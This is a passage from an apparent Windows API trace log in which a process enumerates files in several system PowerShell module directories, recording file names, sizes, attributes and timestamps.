dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus.psd1", cAlternateFileName="")) returned 1 [0265.272] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus.psd1", cAlternateFileName="")) returned 0 [0265.272] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1")) returned 0x20 [0265.273] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbbc0 [0265.273] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.274] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe289d66, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe289d66, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe289d66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e26, dwReserved0=0x0, dwReserved1=0x0, cFileName="CmdletHelpers.psm1", cAlternateFileName="")) returned 1 [0265.275] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.275] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaca, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchConfiguration.psm1", cAlternateFileName="")) returned 1 [0265.276] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe289d66, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe289d66, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe289d66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6045, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchEthernetPort.psm1", cAlternateFileName="")) returned 1 [0265.276] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchFeature.psm1", cAlternateFileName="")) returned 1 [0265.277] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x683, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchGlobalSettingData.psm1", cAlternateFileName="")) returned 1 [0265.277] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4366, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.format.ps1xml", cAlternateFileName="")) returned 1 [0265.277] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x87e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.psd1", cAlternateFileName="")) returned 1 [0265.278] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.types.ps1xml", cAlternateFileName="")) returned 1 [0265.278] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x471f, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchVlan.psm1", cAlternateFileName="")) returned 1 [0265.279] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x471f, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchVlan.psm1", cAlternateFileName="")) returned 0 [0265.279] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbbc0 [0265.280] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.281] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe289d66, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe289d66, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe289d66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e26, dwReserved0=0x0, dwReserved1=0x0, cFileName="CmdletHelpers.psm1", cAlternateFileName="")) returned 1 [0265.281] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.282] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaca, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchConfiguration.psm1", cAlternateFileName="")) returned 1 [0265.282] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe289d66, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe289d66, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe289d66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6045, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchEthernetPort.psm1", cAlternateFileName="")) returned 1 [0265.283] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchFeature.psm1", cAlternateFileName="")) returned 1 [0265.283] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x683, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchGlobalSettingData.psm1", cAlternateFileName="")) returned 1 [0265.284] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4366, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.format.ps1xml", cAlternateFileName="")) returned 1 [0265.284] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x87e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.psd1", cAlternateFileName="")) returned 1 [0265.285] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.types.ps1xml", cAlternateFileName="")) returned 1 [0265.285] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x471f, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchVlan.psm1", cAlternateFileName="")) returned 1 [0265.286] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.286] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbbc0 [0265.288] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.289] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe289d66, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe289d66, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe289d66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e26, dwReserved0=0x0, dwReserved1=0x0, cFileName="CmdletHelpers.psm1", cAlternateFileName="")) returned 1 [0265.289] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.290] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaca, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchConfiguration.psm1", cAlternateFileName="")) returned 1 [0265.290] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe289d66, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe289d66, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe289d66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6045, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchEthernetPort.psm1", cAlternateFileName="")) returned 1 [0265.290] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchFeature.psm1", cAlternateFileName="")) returned 1 [0265.291] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x683, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchGlobalSettingData.psm1", cAlternateFileName="")) returned 1 [0265.291] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4366, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.format.ps1xml", cAlternateFileName="")) returned 1 [0265.292] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x87e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.psd1", cAlternateFileName="")) returned 1 [0265.292] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager.types.ps1xml", cAlternateFileName="")) returned 1 [0265.293] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x471f, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchVlan.psm1", cAlternateFileName="")) returned 1 [0265.294] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x471f, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchVlan.psm1", cAlternateFileName="")) returned 0 [0265.294] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1")) returned 0x20 [0265.295] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.295] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.296] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_Net6to4Configuration.cdxml", cAlternateFileName="")) returned 1 [0265.296] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x533, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_Net6to4Configuration.format.ps1xml", cAlternateFileName="")) returned 1 [0265.297] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb47, 